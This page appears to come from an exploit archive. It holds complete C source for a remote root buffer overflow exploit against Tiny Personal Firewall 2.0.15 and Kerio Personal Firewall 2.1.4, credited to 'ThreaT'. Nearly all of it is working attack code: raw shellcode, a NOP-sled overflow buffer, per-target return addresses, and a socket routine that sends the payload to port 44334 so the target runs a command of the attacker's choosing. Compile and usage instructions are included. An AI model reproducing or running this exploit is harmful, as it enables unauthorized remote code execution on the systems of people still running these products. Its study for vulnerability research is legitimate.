Tiny & Kerio Personal Firewalls remote root buffer overflow
|
* Version TXT Disponible ici *
/**************************************************
* Personal Firewall Engine remote buffer overflow Exploit *
**************************************************
*
* Coded By ThreaT.
*
**************************************************
*
* This exploit take advantage of the vulnerability
* and execute a command on remote workstations
* equiped with the fallowing PSW :
*
* - Tiny Personal Firewall 2.0.15
* - Kerio Personal Firewall 2.1.4
*
**************************************************
* PFExploit.exe
* ===========================================
* ompile with : cl.exe /nologo PFExploit.c /link wsock32.lib
* ===========================================
*/
#include
#include
#define len 0x1494
void main (int argc, char *argv[])
{
SOCKET sock1;
SOCKADDR_IN sin;
int i;
DWORD byte = htonl(len);
char buffer[len], *p,
shellcode[] =
"\xEB\x69\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1"
"\x8B\x70\x30\x80\x3E\x4B\x75\x4A\x8B\x40\x18\x8B\x58\x3C\x03\xD8"
"\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03\xF0\x56\x8B\x73\x24\x03\xF0"
"\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18\x4B\x8B\x34\x9A\x03\xF0\x03"
"\x74\x24\x10\x8B\x36\x39\x74\x24\x0C\x74\x08\x4B\x23\xDB\x75\xEA"
"\x58\x58\xC3\x5F\x33\xC9\x66\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04"
"\x07\xC3\x8B\x18\x39\x08\x8B\xC3\x75\xA6\xC3\xEB\x22\x6A\x01\x68"
"\x69\x6E\x45\x78\xE8\x89\xFF\xFF\xFF\x6A\x01\xFF\x74\x24\x0C\xFF"
"\xD0\x6A\x01\x68\x78\x69\x74\x50\xE8\x75\xFF\xFF\xFF\xFF\xD0\xE8"
"\xD9\xFF\xFF\xFF";
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
struct _target {
char Name[4];
char *RetAddr;
char *App;
} targ[2] = {
{"TPF" , "\xED\xEA\x2F\x01", "Tiny Personal Firewall 2.0.15"},
{"KPF" , "\xF8\xEA\x61\x01", "Kerio Personal Firewall 2.1.4"},
};
printf ("######################################################\n"
"Personal Firewall Engine, Remote buffer overflow Exploit !\n"
"#####################################################\n"
"Discovered by CORE Security Technologies & Coded by ThreaT\n-\n"
"\n"
"http://s0h.cc/~threat\n-\n\n");
if (argc < 4)
{
printf ("usage : PFExploit.exe \n\n"
"TARGET ARE\n"
"__________\n\n"
"TPF : for Tiny Personal Firewall 2.0.15\n"
"KPF : for Kerio Personal Firewall 2.1.4\n\n");
ExitProcess (0);
}
if (!(p = (char *) LocalAlloc (LPTR,(strlen (shellcode)+strlen(argv[3])+3))))
{
printf ("error, cannot allocate memory\n");
ExitProcess (0);
}
memset (buffer,0x90,len);
strcpy (p,shellcode);
lstrcat (p,argv[3]);
memcpy (&buffer[200],p,strlen (p)+1);
for (i=0; i < 2 ; i++)
if (!lstrcmpi (argv[1],targ[i].Name)) break;
if (i > 1)
{
printf ("Erreur : la cible %s est inconnue\n",argv[1]);
ExitProcess (0);
}
if (WSAStartup(wVersionRequested, &wsadata))
{
printf ("Erreur d'initialisation Winsock\n");
ExitProcess (0);
}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr=inet_addr (argv[2]);
sin.sin_port = htons (44334);
memcpy (&buffer[0x1490],targ[i].RetAddr,4);
printf ("Cible : %s\n\n"
"Connecting to %s...", targ[i].App, argv[2]);
sock1 = socket (AF_INET, SOCK_STREAM, 0);
bind (sock1, (SOCKADDR *)&sin, sizeof (sin));
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) )
{
printf ("connexion failed !\n");
ExitProcess (0);
}
printf ("ok!\n\n"
"sending crash for remote execution of '%s'...",argv[3]);
Sleep (1000);
send (sock1,(const char FAR *)(DWORD)&byte,sizeof (DWORD),0);
send (sock1,buffer,len,0);
puts ("ok");
}
|